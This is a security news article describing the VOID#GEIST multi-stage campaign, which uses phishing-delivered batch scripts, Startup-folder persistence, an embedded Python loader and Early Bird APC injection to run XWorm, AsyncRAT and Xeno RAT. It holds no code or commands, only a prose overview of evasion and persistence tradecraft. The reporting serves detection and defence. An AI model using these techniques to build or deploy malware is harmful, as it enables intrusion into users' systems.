Multi-Stage Malware Campaign Delivers XWorm, AsyncRAT, and XenoRAT via VOID#GEIST

Post Views: 111

Cybersecurity Researchers Uncover Sophisticated Malware Campaign

Cybersecurity researchers have uncovered a sophisticated multi-stage malware campaign that utilizes batch scripts to deliver various encrypted remote access trojan (RAT) payloads, including XWorm, AsyncRAT, and Xeno RAT. Dubbed VOID#GEIST, this stealthy attack chain employs a complex, script-based delivery framework that mimics legitimate user activity.

Initial Stage of the Attack

The initial stage of the attack begins with a batch script fetched from a TryCloudflare domain, often distributed via phishing emails. Upon execution, the script deliberately avoids escalating privileges, instead leveraging the permission rights of the currently logged-in user to establish an initial foothold. This allows the malware to blend into seemingly innocuous administrative operations.

Malware Persistence and Payload Delivery

The script then launches a decoy PDF document, using Google Chrome in full-screen mode, to distract the user while it executes a PowerShell command to re-launch the original batch script. This secondary script is designed to persist across system reboots by placing an auxiliary batch script in the Windows user’s Startup directory.

The malware’s persistence method operates within the current user’s privilege context, avoiding more intrusive techniques that might trigger security alerts. This design choice reduces the likelihood of triggering privilege escalation prompts or registry-monitoring alerts.

Final Stage of the Attack

The next phase of the attack involves the malware reaching out to a TryCloudflare domain to fetch additional payloads in the form of ZIP archives. These archives contain multiple files, including a Python-based loader script, encrypted shellcode payloads corresponding to XWorm, Xeno RAT, and AsyncRAT, and key files containing decryption keys.

The attack sequence then deploys a legitimate embedded Python runtime directly from python.org, offering portability, reliability, and stealth. This allows the malware to operate even if the infected endpoint does not have Python installed.

The Python runtime is used to launch the loader script, which decrypts and runs the XWorm payload using Early Bird APC injection. The malware also leverages a legitimate Microsoft binary to invoke Python and launch Xeno RAT. In the final stage, the loader uses the same injection mechanism to launch AsyncRAT.

“The infection chain culminates with the malware transmitting a minimal HTTP beacon back to attacker-controlled C2 infrastructure hosted on TryCloudflare, confirming the digital break-in. While the targets of the attack are currently unknown, the repeated injection pattern reinforces the modular architecture of the framework, making it a strong behavioral indicator for detection.”

Conclusion

Researchers note that this attack demonstrates the increasing shift towards complex, script-based delivery frameworks that closely mimic legitimate user activity. The use of fileless execution mechanisms and legitimate embedded runtimes allows the malware to operate without triggering security alerts, highlighting the need for robust detection and prevention measures.